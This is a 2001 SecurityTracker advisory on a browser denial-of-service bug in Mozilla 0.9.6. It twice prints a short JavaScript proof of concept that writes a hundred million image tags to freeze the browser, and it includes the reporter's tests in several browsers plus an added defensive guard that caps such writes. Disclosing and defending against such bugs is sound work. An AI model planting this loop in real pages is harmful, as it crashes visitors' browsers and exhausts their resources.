SecurityTracker.com
Category:  Application (Web Browser)  >  Mozilla Browser
Vendors:  Mozilla.org
Mozilla Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users
Date:  Dec 22 2001
Impact:  Denial of service via network
Exploit Included:  Yes  
Version(s): Mozilla 0.9.6 (build 2001112009)
Description:  A denial of service vulnerability was reported in the Mozilla browser. A remote user can create Javascript that will cause the browser to consume nearly all CPU resources and then crash.

It is reported that the following code may be used to cause the browser to crash:

<script>
for(i=0;i<100000000;i++) {
document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>

It is reported that this will trigger a large memory leak (bigger than 1Mb per second).

Impact:  A remote user can cause the browser to consume nearly all CPU resources and then crash.
Solution:  No solution was available at the time of this entry.
Vendor URL:  www.mozilla.org/
Cause:  Resource error
Underlying OS:  BeOS, Linux (Any), MacOS, UNIX (Any), Windows (Any)
Underlying OS Comments:  Tested on Windows 2000; other operating systems may or may not be affected
Reported By:  Pavel Titov <Pavel.Titov@mtu-net.ru>
Message History:   None.
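
Added example, not part of the original advisory or of Mozilla's code: a budget guard around a write function that turns the unbounded loop shown above into a bounded, catchable error. The names guardWrites and WriteBudgetError, the limit values, and the stand-in sink are assumptions made for illustration.

```javascript
// Added example: cap script-generated markup so an unbounded write loop
// fails fast instead of consuming memory until the process dies.
// guardWrites, WriteBudgetError and the default limits are hypothetical.
class WriteBudgetError extends Error {}

function guardWrites(sink, { maxImages = 1000, maxChars = 1 << 20 } = {}) {
  let images = 0;
  let chars = 0;
  return function write(markup) {
    const text = String(markup);
    // Count every <img start tag in this chunk (case-insensitive).
    const found = (text.match(/<img\b/gi) || []).length;
    if (images + found > maxImages) {
      throw new WriteBudgetError(`image budget of ${maxImages} exceeded`);
    }
    // Total-size cap: backstop for tags split across several calls.
    if (chars + text.length > maxChars) {
      throw new WriteBudgetError(`markup budget of ${maxChars} chars exceeded`);
    }
    images += found;
    chars += text.length;
    return sink(text);
  };
}

// Constructed demo: an array-backed sink stands in for document.write so the
// block runs outside a browser. Assumed in-page use:
//   document.write = guardWrites(document.write.bind(document));
function runDemo(iterations, limits) {
  const accepted = [];
  const write = guardWrites((t) => accepted.push(t), limits);
  try {
    for (let i = 0; i < iterations; i++) {
      write("<img src=http://fakehost.com/" + i + ".gif>");
    }
    return { stopped: false, accepted: accepted.length };
  } catch (err) {
    if (!(err instanceof WriteBudgetError)) throw err;
    return { stopped: true, accepted: accepted.length, reason: err.message };
  }
}

// The advisory's loop bound, stopped after 500 accepted writes.
console.log(runDemo(100000000, { maxImages: 500 }));
```

The guard only accounts for markup passed through the wrapped function; elements created through other DOM interfaces need their own limit.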


 Source Message Contents

Date:  Tue, 11 Dec 2001 19:57:11 +0300
From:  Pavel Titov <Pavel.Titov@mtu-net.ru>
Subject:  Browsers fails on big image count

 

Code

<script>
for(i=0;i<100000000;i++) {
   document.write("<img src=http://fakehost.com/"+i+".gif>");
}
</script>

Browser reaction

IE 6 (build 2600) @ Win2K - after a long time with ~50% CPU utilization
and very high disk utilization asks about stopping the script. Small memory
leak (a few Mb per minute).
IE 6 (build 2600) @ Win98 - freezes, other IE windows take very long to render,
terminating the task causes computer lockup.
Mozilla 0.9.6 (build 2001112009) @ Win2K - freezes, ~98% CPU utilization
and big memory leak (bigger than 1Mb per second).
Opera 5.11 (build 094d) @ Win2K - does not freeze, responds, but not very
fast. Big CPU utilization and very small memory leak (a few hundred
kilobytes per minute).

-- 
Pavel Titov
Homepage: http://www.titov.pp.ru/
Home gopherspace: gopher://paveltitov.virtualave.net:7070/

 



Copyright 2002, SecurityGlobal.net LLC